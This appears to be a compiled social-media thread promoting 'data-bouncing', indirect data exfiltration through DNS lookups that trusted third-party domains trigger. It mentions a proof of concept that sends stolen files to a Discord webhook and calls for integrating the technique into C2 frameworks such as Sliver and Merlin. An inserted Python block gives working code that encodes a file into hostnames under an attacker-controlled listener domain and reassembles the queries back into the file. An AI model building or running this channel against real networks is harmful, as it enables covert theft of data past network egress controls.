A little thread on the concern set of data-bouncing:
The most important component here is that the exfil is second order, also known as indirect. This means you can’t control it within your network. While many refer to it as a DNS exfil, that’s only the second leg. 1/*
Been building on this idea https://t.co/9g4UmKZZeS
Using signup forms for databounce/data exfil
Got the PoC working: Playwright automation to register emails, triggers DNS lookups -> my listener catches + sends the file to a Discord webhook.
data-exfil using facebook reg :D!
If you want to databounce via email https://t.co/LG9GjiqjxZ
This is crude but functional
It will use the hostname space as you’d expect, 500 recipients per send
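The "hostname space" the post above refers to is the encoding constraint of the second leg: whatever trusted service resolves the name (a registration mailer, a reverse proxy honouring a Host or X-Forwarded-For header, and so on), the data still has to fit in DNS labels of at most 63 characters and a name of at most 253, and it arrives at the listener as an unordered stream of queries. The example below is added here as an illustration and is not the thread author's tool or PoC; `dns.example` as the listener apex, the `seq-total.payload.transfer.apex` layout and the constructed sample file are all assumptions. It shows only the encode and listener-side reassembly; the first leg (handing the hostnames to a trusted domain) is deliberately left out.

```python
import base64
import binascii
import random
import re

# Hypothetical attacker-controlled apex whose authoritative server logs every
# query it receives. Not from the original thread.
LISTENER_DOMAIN = "dns.example"
MAX_LABEL = 63   # RFC 1035 per-label limit
MAX_NAME = 253   # practical limit for a full name

def encode_chunks(data: bytes, transfer_id: str, chunk_bytes: int = 30) -> list:
    """Split data into hostnames shaped <seq>-<total>.<b32>.<transfer_id>.<apex>.

    Base32 (lowercase, padding stripped) is used instead of base64 because DNS is
    case-insensitive and resolvers may randomise case (0x20 encoding), which would
    corrupt a base64 payload. 30 raw bytes become 48 base32 chars, under MAX_LABEL.
    """
    total = (len(data) + chunk_bytes - 1) // chunk_bytes
    names = []
    for seq in range(total):
        piece = data[seq * chunk_bytes:(seq + 1) * chunk_bytes]
        payload = base64.b32encode(piece).decode().rstrip("=").lower()
        name = f"{seq}-{total}.{payload}.{transfer_id}.{LISTENER_DOMAIN}"
        labels = name.split(".")
        assert max(map(len, labels)) <= MAX_LABEL and len(name) <= MAX_NAME
        names.append(name)
    return names

# Listener side: the only thing the authoritative server sees is query names.
_QUERY_RE = re.compile(
    r"^(\d+)-(\d+)\.([a-z2-7]+)\.([a-z0-9]+)\." + re.escape(LISTENER_DOMAIN) + r"\.?$"
)

def reassemble(query_names) -> dict:
    """Rebuild every transfer seen in a (possibly out-of-order, duplicated, noisy)
    list of query names. Returns {transfer_id: bytes or None if incomplete}."""
    transfers = {}  # transfer_id -> (total, {seq: piece})
    for q in query_names:
        m = _QUERY_RE.match(q.lower())
        if not m:
            continue  # unrelated lookups (the apex itself, scanners, MX probes)
        seq, total, payload, tid = int(m[1]), int(m[2]), m[3], m[4]
        try:
            piece = base64.b32decode(payload.upper() + "=" * (-len(payload) % 8))
        except binascii.Error:
            continue  # malformed label, ignore rather than poison the transfer
        known_total, parts = transfers.setdefault(tid, (total, {}))
        if known_total != total:
            continue  # conflicting metadata for the same id, drop it
        parts.setdefault(seq, piece)  # resolver retries produce duplicates; keep first
    result = {}
    for tid, (total, parts) in transfers.items():
        complete = len(parts) == total and set(parts) == set(range(total))
        result[tid] = b"".join(parts[i] for i in range(total)) if complete else None
    return result

def demo():
    """Constructed end-to-end run: a sample file, a shuffled/duplicated/noisy
    listener log, and the recovered bytes."""
    sample = b"constructed sample: contents of secret.txt go here\n" * 3
    names = encode_chunks(sample, "t1")
    log = names + names[:2] + ["www.dns.example", "mail.example.com"]
    random.Random(1).shuffle(log)          # DNS gives no ordering guarantee
    return names, reassemble(log)["t1"] == sample

if __name__ == "__main__":
    names, ok = demo()
    print("\n".join(names))
    print("recovered intact:", ok)
```

The sequence and total counters in the first label are what make the scheme tolerant of the second leg's behaviour: queries arrive in any order, resolvers retry, and the listener also sees unrelated traffic for the apex. A missing chunk leaves the transfer reported as `None` instead of silently yielding a truncated file.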
We feel that the only reason Databouncing hasn’t gotten the attention it deserves is because the PoCs have mostly been fun demonstrations of its capability - if you could share for reach 🙌❤️ 4/4
A little bit of positive downtime, and we’re back at it
We’re looking for some assistance in building databouncing integration into C2 frameworks (Sliver, Tuoni, Merlin, others?)
1/4
I’d be happy to put a reward out for whoever authors something stable first; you’d get support from myself, @DeathsPirate and @N1ckDunn where we have time 3/4
While databouncing is pretty unstoppable in most cases it’s always nice if you’re gifted even more:
PAN-234015
The X-Forwarded-For (XFF) value is not displayed in traffic logs.
Ayo #bugbounty hunters, you want to squeeze some money out of those lame host header poisonings? Check out CWE-441 - then check out #databouncing - all you have to do is argue with triage until you are a millionaire 😁🫡
@Microsoft asked us to refer to @Akamai when we demo'd Databouncing through their domains, Akamai's guy said essentially 'that's how the internet works', what's interesting is that when we spoke to NSA it was suggested that @Cloudflare had a response
There are some very real implications to this technique and the reason we put time and money into building https://t.co/TWWq4yPk8c was to force the conversation not being had. - we'll start chipping away visually demonstrating how to move files via trusted domains...